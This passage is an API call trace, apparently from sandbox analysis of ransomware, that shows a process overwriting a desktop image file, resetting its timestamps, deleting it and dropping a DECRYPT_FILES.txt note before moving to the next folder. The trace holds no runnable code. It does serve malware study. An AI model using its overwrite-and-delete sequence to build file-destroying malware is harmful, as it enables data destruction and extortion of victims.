dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.967] GetFileType (hFile=0x398) returned 0x1 [0070.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee180) returned 1 [0070.967] GetFileType (hFile=0x398) returned 0x1 [0070.968] WriteFile (in: hFile=0x398, lpBuffer=0x225aea8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1c0ee2e8, lpOverlapped=0x0 | out: lpBuffer=0x225aea8*, lpNumberOfBytesWritten=0x1c0ee2e8*=0x77d, lpOverlapped=0x0) returned 1 [0070.969] CloseHandle (hObject=0x398) returned 1 [0070.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5a0) returned 1 [0070.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), fInfoLevelId=0x0, lpFileInformation=0x1c0ee680 | out: lpFileInformation=0x1c0ee680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x674220d0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x8ca34130, ftLastAccessTime.dwHighDateTime=0x1d4d30a, ftLastWriteTime.dwLowDateTime=0x8ca34130, ftLastWriteTime.dwHighDateTime=0x1d4d30a, nFileSizeHigh=0x0, nFileSizeLow=0xa10c)) returned 1 [0070.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee560) returned 1 [0070.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.970] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", dwFileAttributes=0x80) returned 1 [0070.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5e0) returned 1 [0070.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), fInfoLevelId=0x0, lpFileInformation=0x2262a90 | out: lpFileInformation=0x2262a90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x674220d0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x8ca34130, ftLastAccessTime.dwHighDateTime=0x1d4d30a, ftLastWriteTime.dwLowDateTime=0x8ca34130, ftLastWriteTime.dwHighDateTime=0x1d4d30a, nFileSizeHigh=0x0, nFileSizeLow=0xa10c)) returned 1 [0070.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5a0) returned 1 [0070.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0edff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4d0) returned 1 [0070.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.971] GetFileType (hFile=0x398) returned 0x1 [0070.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee440) returned 1 [0070.971] GetFileType (hFile=0x398) returned 0x1 [0070.971] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.972] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.973] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.973] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.974] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.975] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.976] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.976] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.977] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.978] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.979] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.979] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x200, lpOverlapped=0x0) returned 1 [0070.979] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.040] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.041] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.042] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.042] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.043] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.044] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.045] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.045] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.046] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.047] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.047] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x200, lpOverlapped=0x0) returned 1 [0071.047] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.048] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.048] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.049] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.050] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.051] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.051] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.052] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.053] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.054] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.054] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.054] WriteFile (in: hFile=0x398, lpBuffer=0x2262f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x2262f08*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x200, lpOverlapped=0x0) returned 1 [0071.054] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.056] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0071.056] SetEndOfFile (hFile=0x398) returned 1 [0071.057] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0071.057] CloseHandle (hObject=0x398) returned 1 [0071.058] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0071.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.058] GetFileType (hFile=0x398) returned 0x1 [0071.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.058] GetFileType (hFile=0x398) returned 0x1 [0071.058] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee6a8, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.058] CloseHandle (hObject=0x398) returned 1 [0071.058] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0071.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.058] GetFileType (hFile=0x398) returned 0x1 [0071.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.058] GetFileType (hFile=0x398) returned 0x1 [0071.058] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee6a8, lpLastWriteTime=0x0) returned 1 [0071.058] CloseHandle (hObject=0x398) returned 1 [0071.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0071.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0071.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.059] GetFileType (hFile=0x398) returned 0x1 [0071.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0071.059] GetFileType (hFile=0x398) returned 0x1 [0071.059] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee6a8) returned 1 [0071.059] CloseHandle (hObject=0x398) returned 1 [0071.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0071.059] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png")) returned 1 [0071.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0071.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", lpFilePart=0x0) returned 0x4b [0071.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.061] GetFileType (hFile=0x398) returned 0x1 [0071.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.061] GetFileType (hFile=0x398) returned 0x1 [0071.061] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee748, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.063] CloseHandle (hObject=0x398) returned 1 [0071.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", lpFilePart=0x0) returned 0x4b [0071.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.064] GetFileType (hFile=0x398) returned 0x1 [0071.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.064] GetFileType (hFile=0x398) returned 0x1 [0071.064] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee748, lpLastWriteTime=0x0) returned 1 [0071.064] CloseHandle (hObject=0x398) returned 1 [0071.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", lpFilePart=0x0) returned 0x4b [0071.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0071.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.064] GetFileType (hFile=0x398) returned 0x1 [0071.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0071.064] GetFileType (hFile=0x398) returned 0x1 [0071.064] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee748) returned 1 [0071.064] CloseHandle (hObject=0x398) returned 1 [0071.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x3c [0071.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0071.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x398 [0071.066] GetFileType (hFile=0x398) returned 0x1 [0071.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0071.066] GetFileType (hFile=0x398) returned 0x1 [0071.066] WriteFile (in: hFile=0x398, lpBuffer=0x22b9f00*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x22b9f00*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0071.067] CloseHandle (hObject=0x398) returned 1 [0071.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0071.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-", lpFilePart=0x0) returned 0x3a [0071.068] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\", lpFilePart=0x0) returned 0x3b [0071.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.068] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.068] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x595b250, ftCreationTime.dwHighDateTime=0x1d4cbb6, ftLastAccessTime.dwLowDateTime=0x9034eba0, ftLastAccessTime.dwHighDateTime=0x1d4cea5, ftLastWriteTime.dwLowDateTime=0x9034eba0, 